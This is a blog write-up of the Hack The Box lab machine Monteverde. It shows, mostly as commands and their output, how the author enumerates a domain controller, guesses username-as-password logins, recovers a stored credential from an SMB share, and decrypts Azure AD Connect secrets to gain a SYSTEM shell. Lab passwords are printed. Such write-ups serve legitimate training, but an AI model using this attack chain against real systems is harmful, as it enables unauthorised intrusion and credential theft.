Posted on by

HTB: Monteverde

Details

This machine is Monreverde from Hack The Box

Recon

kali@kali:~$ nmap -sV -p- -Pn -T4 10.10.10.172
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-21 21:36 GMT
Stats: 0:00:46 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 36.15% done; ETC: 21:39 (0:01:23 remaining)
Nmap scan report for 10.10.10.172
Host is up (0.024s latency).
Not shown: 65517 filtered ports
PORT      STATE SERVICE       VERSION
53/tcp    open  domain?
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-02-21 21:49:52Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         Microsoft Windows RPC
49675/tcp open  msrpc         Microsoft Windows RPC
49706/tcp open  msrpc         Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=2/21%Time=5E504E12%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 287.19 seconds

So it is likely a domain controller, and has the domain megabank.local. I added this to hosts and ran enum4linux

kali@kali:~$ enum4linux -a megabank.local
[SNIP]
===============================
|    Users on megabank.local    |
 ===============================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 866.
index: 0xfb6 RID: 0x450 acb: 0x00000210 Account: AAD_987d7f2f57d2       Name: AAD_987d7f2f57d2  Desc: Service account for the Synchronization Service with installation identifier 05c97990-7587-4a3d-b312-309adfc172d9 running on computer MONTEVERDE.
index: 0xfd0 RID: 0xa35 acb: 0x00000210 Account: dgalanos       Name: Dimitris Galanos  Desc: (null)
index: 0xedb RID: 0x1f5 acb: 0x00000215 Account: Guest  Name: (null)    Desc: Built-in account for guest access to the computer/domain
index: 0xfc3 RID: 0x641 acb: 0x00000210 Account: mhope  Name: Mike Hope Desc: (null)
index: 0xfd1 RID: 0xa36 acb: 0x00000210 Account: roleary        Name: Ray O'Leary       Desc: (null)
index: 0xfc5 RID: 0xa2a acb: 0x00000210 Account: SABatchJobs    Name: SABatchJobs       Desc: (null)
index: 0xfd2 RID: 0xa37 acb: 0x00000210 Account: smorgan        Name: Sally Morgan      Desc: (null)
index: 0xfc6 RID: 0xa2b acb: 0x00000210 Account: svc-ata        Name: svc-ata   Desc: (null)
index: 0xfc7 RID: 0xa2c acb: 0x00000210 Account: svc-bexec      Name: svc-bexec Desc: (null)
index: 0xfc8 RID: 0xa2d acb: 0x00000210 Account: svc-netapp     Name: svc-netapp        Desc: (null)
[SNIP]
[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
Minimum Password Length: 7
[SNIP]

User

So for users whose name was 7 or more characters, I tried using the username as the password too

kali@kali:~$ smbmap -H megabank.local -u SABatchJobs -p SABatchJobs
[+] Finding open SMB ports....
[+] User SMB session established on megabank.local...
[+] IP: megabank.local:445      Name: unknown
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        .
        dr--r--r--                0 Fri Jan  3 12:43:36 2020    .
        dr--r--r--                0 Fri Jan  3 12:43:36 2020    ..
        azure_uploads                                           READ ONLY
        C$                                                      NO ACCESS       Default share
        E$                                                      NO ACCESS       Default share
        .
        fr--r--r--                3 Sun Dec 31 23:58:45 1600    InitShutdown
        fr--r--r--                4 Sun Dec 31 23:58:45 1600    lsass
        fr--r--r--                3 Sun Dec 31 23:58:45 1600    ntsvcs
        fr--r--r--                3 Sun Dec 31 23:58:45 1600    scerpc
        fr--r--r--                1 Sun Dec 31 23:58:45 1600    Winsock2\CatalogChangeListener-3ac-0
        fr--r--r--                3 Sun Dec 31 23:58:45 1600    epmapper
        fr--r--r--                1 Sun Dec 31 23:58:45 1600    Winsock2\CatalogChangeListener-1f0-0
        fr--r--r--                3 Sun Dec 31 23:58:45 1600    LSM_API_service
        fr--r--r--                3 Sun Dec 31 23:58:45 1600    eventlog
        fr--r--r--                1 Sun Dec 31 23:58:45 1600    Winsock2\CatalogChangeListener-468-0
        fr--r--r--                3 Sun Dec 31 23:58:45 1600    atsvc
        fr--r--r--                1 Sun Dec 31 23:58:45 1600    Winsock2\CatalogChangeListener-6a4-0
        fr--r--r--                4 Sun Dec 31 23:58:45 1600    wkssvc
        fr--r--r--                1 Sun Dec 31 23:58:45 1600    Winsock2\CatalogChangeListener-290-0
        fr--r--r--                1 Sun Dec 31 23:58:45 1600    Winsock2\CatalogChangeListener-290-1
        fr--r--r--                3 Sun Dec 31 23:58:45 1600    RpcProxy\49673
        fr--r--r--                3 Sun Dec 31 23:58:45 1600    3d1069c918f5e48c
        fr--r--r--                3 Sun Dec 31 23:58:45 1600    RpcProxy\593
        fr--r--r--                4 Sun Dec 31 23:58:45 1600    srvsvc
        fr--r--r--                3 Sun Dec 31 23:58:45 1600    spoolss
        fr--r--r--                1 Sun Dec 31 23:58:45 1600    Winsock2\CatalogChangeListener-b58-0
        fr--r--r--                3 Sun Dec 31 23:58:45 1600    netdfs
        fr--r--r--                1 Sun Dec 31 23:58:45 1600    vgauth-service
        fr--r--r--                1 Sun Dec 31 23:58:45 1600    Winsock2\CatalogChangeListener-27c-0
        fr--r--r--                3 Sun Dec 31 23:58:45 1600    W32TIME_ALT
        fr--r--r--                3 Sun Dec 31 23:58:45 1600    SQLLocal\MSSQLSERVER
        fr--r--r--                2 Sun Dec 31 23:58:45 1600    sql\query
        fr--r--r--                1 Sun Dec 31 23:58:45 1600    Winsock2\CatalogChangeListener-bd4-0
        fr--r--r--                1 Sun Dec 31 23:58:45 1600    PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER
        fr--r--r--                1 Sun Dec 31 23:58:45 1600    CPFATP_5972_v4.0.30319
        fr--r--r--                1 Sun Dec 31 23:58:45 1600    PSHost.132267952149387128.5972.DefaultAppDomain.miiserver
        fr--r--r--                1 Sun Dec 31 23:58:45 1600    GoogleCrashServices\S-1-5-18
        fr--r--r--                1 Sun Dec 31 23:58:45 1600    GoogleCrashServices\S-1-5-18-x64
        fr--r--r--                1 Sun Dec 31 23:58:45 1600    Winsock2\CatalogChangeListener-bc0-0
        IPC$                                                    READ ONLY       Remote IPC
        .
        dr--r--r--                0 Thu Jan  2 22:05:27 2020    .
        dr--r--r--                0 Thu Jan  2 22:05:27 2020    ..
        NETLOGON                                                READ ONLY       Logon server share
        .
        dr--r--r--                0 Thu Jan  2 22:05:27 2020    .
        dr--r--r--                0 Thu Jan  2 22:05:27 2020    ..
        dr--r--r--                0 Thu Jan  2 22:05:27 2020    MEGABANK.LOCAL
        SYSVOL                                                  READ ONLY       Logon server share
        .
        dr--r--r--                0 Fri Jan  3 13:12:48 2020    .
        dr--r--r--                0 Fri Jan  3 13:12:48 2020    ..
        dr--r--r--                0 Fri Jan  3 13:15:23 2020    dgalanos
        dr--r--r--                0 Fri Jan  3 13:41:18 2020    mhope
        dr--r--r--                0 Fri Jan  3 13:14:56 2020    roleary
        dr--r--r--                0 Fri Jan  3 13:14:28 2020    smorgan
        users$                                                  READ ONLY

So I connected to the users share with smbclient

smbclient -H //megabank.local/users$ -U SABatchJobs
Enter WORKGROUP\SABatchJobs's password:
Try "help" to get a list of possible commands.
smb: \>

smb: \> ls
.                                   D        0  Fri Jan  3 13:12:48 2020
..                                  D        0  Fri Jan  3 13:12:48 2020
dgalanos                            D        0  Fri Jan  3 13:12:30 2020
mhope                               D        0  Fri Jan  3 13:41:18 2020
roleary                             D        0  Fri Jan  3 13:10:30 2020
smorgan                             D        0  Fri Jan  3 13:10:24 2020

            524031 blocks of size 4096. 519955 blocks available

smb: \mhope\> ls
  .                                   D        0  Fri Jan  3 13:41:18 2020
  ..                                  D        0  Fri Jan  3 13:41:18 2020
  azure.xml                          AR     1212  Fri Jan  3 13:40:23 2020

                524031 blocks of size 4096. 519955 blocks available

smb: \mhope\> get azure.xml
getting file \mhope\azure.xml of size 1212 as azure.xml (4.7 KiloBytes/sec) (average 4.7 KiloBytes/sec)

I took a look at the file

kali@kali:~$ cat azure.xml
��<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
    <Props>
      <DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
      <DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
      <G N="KeyId">00000000-0000-0000-0000-000000000000</G>
      <S N="Password">4n0therD4y@n0th3r$</S>
    </Props>
  </Obj>
</Objs>

There is a password, the directory was called mhope, so I tried it as their password

kali@kali:~$ smbmap -H megabank.local -u mhope -p '4n0therD4y@n0th3r$'
[+] Finding open SMB ports....
[+] User SMB session established on megabank.local...
[+] IP: megabank.local:445      Name: unknown
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        .
        dr--r--r--                0 Fri Jan  3 12:43:36 2020    .
        dr--r--r--                0 Fri Jan  3 12:43:36 2020    ..
        azure_uploads                                           READ ONLY
[SNIP]

It worked, so I tried evil winrm

kali@kali:~$ ./evil-winrm.rb -i megabank.local -u mhope -p '4n0therD4y@n0th3r$'

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\mhope\Documents>

Grab the user flag

*Evil-WinRM* PS C:\Users\mhope\Desktop> type user.txt
[REDACTED]

And onto system

System

*Evil-WinRM* PS C:\Users\mhope> dir

    Directory: C:\Users\mhope

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----         1/3/2020   5:35 AM                .Azure
d-r---         1/3/2020   5:24 AM                3D Objects
d-r---         1/3/2020   5:24 AM                Contacts
d-r---         1/3/2020   5:47 AM                Desktop
d-r---         1/3/2020   5:24 AM                Documents
d-r---         1/3/2020   5:24 AM                Downloads
d-r---         1/3/2020   5:24 AM                Favorites
d-r---         1/3/2020   5:24 AM                Links
d-r---         1/3/2020   5:24 AM                Music
d-r---         1/3/2020   5:24 AM                Pictures
d-r---         1/3/2020   5:24 AM                Saved Games
d-r---         1/3/2020   5:24 AM                Searches
d-r---         1/3/2020   5:24 AM                Videos

The .Azure directory is not normally there

Evil-WinRM* PS C:\Users\mhope> cd .Azure
*Evil-WinRM* PS C:\Users\mhope\.Azure> dir

    Directory: C:\Users\mhope\.Azure

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----         1/3/2020   5:35 AM                ErrorRecords
-a----         1/3/2020   5:31 AM             34 AzurePSDataCollectionProfile.json
-a----         1/3/2020   5:35 AM           2794 AzureRmContext.json
-a----         1/3/2020   5:31 AM            191 AzureRmContextSettings.json
-a----         1/3/2020   5:36 AM           7896 TokenCache.dat

This combined with the contents of Program files 

*Evil-WinRM* PS C:\Program Files> dir

    Directory: C:\Program Files

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----         1/2/2020   9:36 PM                Common Files
d-----         1/2/2020   2:46 PM                internet explorer
d-----         1/2/2020   2:38 PM                Microsoft Analysis Services
d-----         1/2/2020   2:51 PM                Microsoft Azure Active Directory Connect
d-----         1/2/2020   3:37 PM                Microsoft Azure Active Directory Connect Upgrader
d-----         1/2/2020   3:02 PM                Microsoft Azure AD Connect Health Sync Agent
d-----         1/2/2020   2:53 PM                Microsoft Azure AD Sync
d-----         1/2/2020   2:31 PM                Microsoft SQL Server
d-----         1/2/2020   2:25 PM                Microsoft Visual Studio 10.0
d-----         1/2/2020   2:32 PM                Microsoft.NET
d-----         1/3/2020   5:28 AM                PackageManagement
d-----         1/2/2020   9:37 PM                VMware
d-r---         1/2/2020   2:46 PM                Windows Defender
d-----         1/2/2020   2:46 PM                Windows Defender Advanced Threat Protection
d-----        9/15/2018  12:19 AM                Windows Mail
d-----         1/2/2020   2:46 PM                Windows Media Player
d-----        9/15/2018  12:19 AM                Windows Multimedia Platform
d-----        9/15/2018  12:28 AM                windows nt
d-----         1/2/2020   2:46 PM                Windows Photo Viewer
d-----        9/15/2018  12:19 AM                Windows Portable Devices
d-----        9/15/2018  12:19 AM                Windows Security
d-----         1/3/2020   5:28 AM                WindowsPowerShell

Showed they were using azure AD sync and AD Connect

Evil-WinRM* PS C:\Program Files> whoami /groups

GROUP INFORMATION
-----------------

Group Name                                  Type             SID                                          Attributes
=========================================== ================ ============================================ ==================================================
Everyone                                    Well-known group S-1-1-0                                      Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users             Alias            S-1-5-32-580                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554                                 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11                                     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15                                     Mandatory group, Enabled by default, Enabled group
MEGABANK\Azure Admins                       Group            S-1-5-21-391775091-850290835-3566037492-2601 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10                                  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448

And I was in the Azure admins group. I found an exploit for this https://vbscrub.com/2020/01/14/azure-ad-connect-database-exploit-priv-esc/, I uploaded the exploit and ran it

*Evil-WinRM* PS C:\Users\mhope\Desktop> .\AdDecrypt.exe -FullSQL

======================
AZURE AD SYNC CREDENTIAL DECRYPTION TOOL
Based on original code from: https://github.com/fox-it/adconnectdump
======================

Opening database connection...
Executing SQL commands...
Closing database connection...
Decrypting XML...
Parsing XML...
Finished!

DECRYPTED CREDENTIALS:
Username: administrator
Password: d0m@in4dminyeah!
Domain: MEGABANK.LOCAL

With the creds I used PSExec to login

kali@kali:~$ python3 psexec.py administrator:'d0m@in4dminyeah!'@megabank.local
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Requesting shares on megabank.local.....
[*] Found writable share ADMIN$
[*] Uploading file UVqfUSAL.exe
[*] Opening SVCManager on megabank.local.....
[*] Creating service sAcH on megabank.local.....
[*] Starting service sAcH.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.914]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>

C:\Windows\system32>whoami
nt authority\system

And grab the flag

C:\Users\Administrator\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 6002-9F55

Directory of C:\Users\Administrator\Desktop

01/03/2020  05:48 AM    <DIR>          .
01/03/2020  05:48 AM    <DIR>          ..
01/03/2020  05:48 AM                32 root.txt
               1 File(s)             32 bytes
               2 Dir(s)  18,056,060,928 bytes free

C:\Users\Administrator\Desktop>type root.txt
[REDACTED]

Published by Jack

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.